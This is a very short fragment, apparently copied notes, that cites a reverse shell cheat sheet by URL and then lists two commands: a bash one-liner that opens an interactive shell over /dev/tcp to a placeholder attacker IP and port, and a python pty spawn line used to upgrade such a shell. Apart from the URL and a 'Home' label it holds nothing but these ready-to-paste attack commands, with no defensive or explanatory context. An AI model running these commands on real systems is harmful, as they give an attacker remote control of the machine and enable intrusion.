Home
https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells
bash -i >& /dev/tcp/ATTACKING-IP/PORT 0>&1
python3 -c 'import pty; pty.spawn("/bin/bash")'